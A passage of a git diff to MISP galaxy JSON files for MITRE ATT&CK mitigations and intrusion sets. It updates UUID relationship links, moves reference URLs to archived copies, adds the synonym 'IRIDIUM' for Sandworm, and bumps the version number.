- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "809b79cd-be78-4597-88d1-5496d1d9993a",
"value": "Trap Mitigation - T1154"
},
@@ -15171,15 +11952,7 @@
"https://attack.mitre.org/mitigations/T1148"
]
},
- "related": [
- {
- "dest-uuid": "086952c4-5b90-4185-b573-02bad8e11953",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "03c0c586-50ed-45a7-95f4-f496d7eb5330",
"value": "HISTCONTROL Mitigation - T1148"
},
@@ -15192,29 +11965,7 @@
"https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/"
]
},
- "related": [
- {
- "dest-uuid": "0cfe31a7-81fc-472c-bc45-e2808d1066a3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "5909f20f-3c39-4795-be06-ef1ea40d350b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "8c41090b-aa47-4331-986b-8c9a51a91103",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "5d8507c4-603e-4fe1-8a4a-b8241f58734b",
"value": "Defacement Mitigation - T1491"
},
@@ -15227,15 +11978,7 @@
"https://www.engadget.com/2013/10/23/applescript-and-automator-gain-new-features-in-os-x-mavericks/"
]
},
- "related": [
- {
- "dest-uuid": "5ad95aaa-49c1-4784-821d-2e83f47b079b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "1e4ef2c7-ee96-4484-9baa-3b5777561301",
"value": "AppleScript Mitigation - T1155"
},
@@ -15247,15 +11990,7 @@
"https://attack.mitre.org/mitigations/T1169"
]
},
- "related": [
- {
- "dest-uuid": "9e80ddfb-ce32-4961-a778-ca6a10cfae72",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "23bff3ce-021c-4e7a-9aee-60fd40bc7c6c",
"value": "Sudo Mitigation - T1169"
},
@@ -15267,15 +12002,7 @@
"https://attack.mitre.org/mitigations/T1179"
]
},
- "related": [
- {
- "dest-uuid": "66f73398-8394-4711-85e5-34c8540b22a5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "7aee8ea0-0baa-4232-b379-5d9ce98352cf",
"value": "Hooking Mitigation - T1179"
},
@@ -15337,6 +12064,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "155207c0-7f53-4f13-a06b-0a9907ef5096",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "166de1c6-2814-4fe5-8438-4e80f76b169f",
"tags": [
@@ -15771,6 +12505,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "d21bb61f-08ad-4dc1-b001-81ca6cb79954",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "db8f5003-3b20-48f0-9b76-123e44208120",
"tags": [
@@ -15868,6 +12609,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "208884f1-7b83-4473-ac22-4e1cf6c41471",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597",
"tags": [
@@ -15876,21 +12624,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "6be14413-578e-46c1-8304-310762b3ecd5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88",
+ "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -15939,7 +12673,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "d3df754e-997b-4cf9-97d4-70feb3120847",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -16112,7 +12846,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "04ef4356-8926-45e2-9441-634b6f3dcecb",
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -16132,13 +12866,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "0ca7beef-9bbc-4e35-97cf-437384ddce6a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "0cf55441-b176-4332-89e7-2c4c7799d0ff",
"tags": [
@@ -16188,13 +12915,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "27960489-4e7f-461d-a62a-f5c0cb521e4a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "28abec6c-4443-4b03-8206-07f2e264a6b4",
"tags": [
@@ -16223,13 +12943,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2edd9d6a-5674-4326-a600-ba56de467286",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34",
"tags": [
@@ -16286,6 +12999,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517",
"tags": [
@@ -16294,7 +13014,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586",
+ "dest-uuid": "438c967d-3996-4870-bfc2-3954752a1927",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -16315,7 +13035,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484",
+ "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -16342,13 +13062,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "56ff457d-5e39-492b-974c-dfd2b8603ffe",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "573ad264-1371-4ae0-8482-d2673b719dba",
"tags": [
@@ -16377,13 +13090,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b",
"tags": [
@@ -16490,7 +13196,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "8faedf87-dceb-4c35-b2a2-7286f59a3bc3",
+ "dest-uuid": "90c4a591-d02d-490b-92aa-619d9701ac04",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -16503,6 +13209,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "9664ad0e-789e-40ac-82e2-d7b17fbe8fb3",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd",
"tags": [
@@ -16539,7 +13252,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09",
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -16559,13 +13272,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "bf96a5a3-3bce-43b7-8597-88545984c07b",
"tags": [
@@ -16573,20 +13279,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "c4ad009b-6e13-4419-8d21-918a1652de02",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
"tags": [
@@ -16683,5 +13375,5 @@
"value": "Audit - M1047"
}
],
- "version": 25
+ "version": 26
}
diff --git a/clusters/mitre-intrusion-set.json b/clusters/mitre-intrusion-set.json
index 50e43f1..da49cea 100644
--- a/clusters/mitre-intrusion-set.json
+++ b/clusters/mitre-intrusion-set.json
@@ -395,6 +395,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "40f5caa0-4cb7-4117-89fc-d421bb493df3",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "41868330-6ee2-4d0f-b743-9f2294c3c9b6",
"tags": [
@@ -752,6 +759,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "e7cbc1de-1f79-48ee-abfd-da1241c65a15",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0",
"tags": [
@@ -1449,13 +1463,13 @@
"https://blog.morphisec.com/cobalt-gang-2.0",
"https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html",
"https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report",
+ "https://web.archive.org/web/20190508170147/https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/",
+ "https://web.archive.org/web/20190508170630/https://www.riskiq.com/blog/labs/cobalt-strike/",
"https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain",
"https://www.group-ib.com/blog/cobalt",
"https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-target",
"https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf",
"https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf",
- "https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/",
- "https://www.riskiq.com/blog/labs/cobalt-strike/",
"https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish"
],
"synonyms": [
@@ -1613,13 +1627,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab",
"tags": [
@@ -1669,6 +1676,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -2224,13 +2238,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "b77b563c-34bb-4fb8-86a3-3694338f7b47",
"tags": [
@@ -2273,6 +2280,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -2515,6 +2529,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "deb98323-e13f-4b0c-8d94-175379069062",
"tags": [
@@ -3750,11 +3771,11 @@
"meta": {
"external_id": "G0032",
"refs": [
- "https://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/",
"https://attack.mitre.org/groups/G0032",
"https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/",
"https://home.treasury.gov/news/press-releases/sm774",
"https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf",
+ "https://web.archive.org/web/20210723190317/https://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/",
"https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing",
"https://www.us-cert.gov/ncas/alerts/TA17-164A",
"https://www.us-cert.gov/ncas/analysis-reports/AR19-100A"
@@ -3818,13 +3839,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "0715560d-4299-4e84-9e20-6e80ab57e4f2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "09a60ea3-a8d1-4ae5-976e-5783248b72a4",
"tags": [
@@ -3909,13 +3923,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
"tags": [
@@ -3944,13 +3951,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "29be378d-262d-4e99-b00d-852d573628e6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "2b742742-28c3-4e1b-bab7-8350d6300fa7",
"tags": [
@@ -4028,13 +4028,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "3ee16395-03f0-4690-a32e-69ce9ada0f9e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "3ffbdc1f-d2bf-41ab-91a2-c7b857e98079",
"tags": [
@@ -4056,13 +4049,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "454fe82d-6fd2-4ac6-91ab-28a33fe01369",
"tags": [
@@ -4119,13 +4105,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "506f6f49-7045-4156-9007-7474cb44ad6d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b",
"tags": [
@@ -4147,13 +4126,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "60c4b628-4807-4b0b-bbf5-fdac8643c337",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "65013dd2-bc61-43e3-afb5-a14c4fa7437a",
"tags": [
@@ -4315,13 +4287,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "99709758-2b96-48f2-a68a-ad7fbd828091",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "9b325b06-35a1-457d-be46-a4ecc0b7ff0c",
"tags": [
@@ -4336,13 +4301,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "9e7452df-5144-4b6e-b04a-b66dd4016747",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279",
"tags": [
@@ -4385,13 +4343,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "aad11e34-02ca-4220-91cd-2ed420af4db3",
"tags": [
@@ -4434,20 +4385,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "bbe5b322-e2af-4a5e-9625-a4e62bf84ed3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "bd0536d7-b081-43ae-a773-cfb057c5b988",
"tags": [
@@ -4476,13 +4413,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "c11ac61d-50f4-444f-85d8-6f006067f0de",
"tags": [
@@ -4490,13 +4420,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c1b68a96-3c48-49ea-a6c0-9b27359f9c19",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "c325b232-d5bc-4dde-a3ec-71f3db9e8adc",
"tags": [
@@ -4511,20 +4434,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "cc723aff-ec88-40e3-a224-5af9fd983cc4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -4553,20 +4462,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "dc31fe1e-d722-49da-8f5f-92c7b5aff534",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "deb98323-e13f-4b0c-8d94-175379069062",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
"tags": [
@@ -4616,13 +4511,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "e7cbc1de-1f79-48ee-abfd-da1241c65a15",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "e928333f-f3df-4039-9b8b-556c2add0e42",
"tags": [
@@ -4644,13 +4532,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "ebbe170d-aa74-4946-8511-9921243415a3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d",
"tags": [
@@ -4658,13 +4539,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "ef67e13e-5598-4adc-bdb2-998225874fa9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433",
"tags": [
@@ -4707,13 +4581,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "f9cc4d06-775f-4ee1-b401-4e2cc0da30ba",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "fb640c43-aa6b-431e-a961-a279010424ac",
"tags": [
@@ -4983,6 +4850,7 @@
"https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/",
"https://www.justice.gov/opa/page/file/1098481/download",
"https://www.justice.gov/opa/press-release/file/1328521/download",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/",
"https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory",
"https://www.secureworks.com/research/threat-profiles/iron-viking"
],
@@ -4993,7 +4861,8 @@
"IRON VIKING",
"BlackEnergy (Group)",
"Quedagh",
- "Voodoo Bear"
+ "Voodoo Bear",
+ "IRIDIUM"
]
},
"related": [
@@ -5088,6 +4957,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "1da748a5-875d-4212-9222-b4c23ab861be",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0",
"tags": [
@@ -5109,6 +4985,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "26c87906-d750-42c5-946c-d4162c73fc7b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "2b5aa86b-a0df-4382-848d-30abea443327",
"tags": [
@@ -5214,13 +5097,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541",
"tags": [
@@ -5284,13 +5160,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "692074ae-bb62-4a5e-a735-02cb6bde458c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "69f897fd-12a9-4c89-ad6a-46d2f3c38262",
"tags": [
@@ -5299,14 +5168,14 @@
"type": "uses"
},
{
- "dest-uuid": "6ee2dc99-91ad-4534-a7d8-a649358c331f",
+ "dest-uuid": "6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "dest-uuid": "6ee2dc99-91ad-4534-a7d8-a649358c331f",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -5354,6 +5223,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "92a78814-b191-47ca-909c-1ccfe3777414",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d",
"tags": [
@@ -5389,13 +5265,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0",
"tags": [
@@ -5452,6 +5321,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "baf60e1a-afe5-4d31-830f-1b1ba2351884",
"tags": [
@@ -5501,13 +5377,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c",
"tags": [
@@ -5516,14 +5385,14 @@
"type": "uses"
},
{
- "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "deb98323-e13f-4b0c-8d94-175379069062",
+ "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -5543,13 +5412,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "e221eb77-1502-4129-af1d-fe1ad55e7ec6",
"tags": [
@@ -5585,6 +5447,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "ef67e13e-5598-4adc-bdb2-998225874fa9",
"tags": [
@@ -5599,13 +5468,6 @@
],
"type": "similar"
},
- {
- "dest-uuid": "f9e9365a-9ca2-4d9c-8e7c-050d73d1101a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db",
"tags": [
@@ -5758,12 +5620,12 @@
"meta": {
"external_id": "G0044",
"refs": [
- "http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf",
"http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates",
"https://401trg.github.io/pages/burning-umbrella.html",
"https://attack.mitre.org/groups/G0044",
"https://securelist.com/games-are-over/70991/",
- "https://securelist.com/winnti-more-than-just-a-game/37029/"
+ "https://securelist.com/winnti-more-than-just-a-game/37029/",
+ "https://web.archive.org/web/20150412223949/http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf"
],
"synonyms": [
"Winnti Group",
@@ -6193,6 +6055,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d52291b4-bb23-45a8-aef0-3dc7e986ba15",
"tags": [
@@ -6329,6 +6198,20 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "0dda99f0-4701-48ca-9774-8504922e92d3",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "132d5b37-aac5-4378-a8dc-3127b18a73dc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f",
"tags": [
@@ -6357,6 +6240,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "26c87906-d750-42c5-946c-d4162c73fc7b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "294e2560-bd48-44b2-9da2-833b5588ad11",
"tags": [
@@ -6434,6 +6324,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "40f5caa0-4cb7-4117-89fc-d421bb493df3",
"tags": [
@@ -6455,6 +6352,20 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "5282dd9a-d26d-4e16-88b7-7c0f4553daf4",
"tags": [
@@ -6497,6 +6408,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "6151cbea-819b-455a-9fa6-99a1cc58797d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "635cbe30-392d-4e27-978e-66774357c762",
"tags": [
@@ -6532,6 +6450,20 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "7acb15b6-fe2c-4319-b136-6ab36ff0b2d4",
"tags": [
@@ -6546,6 +6478,13 @@
],
"type": "uses"
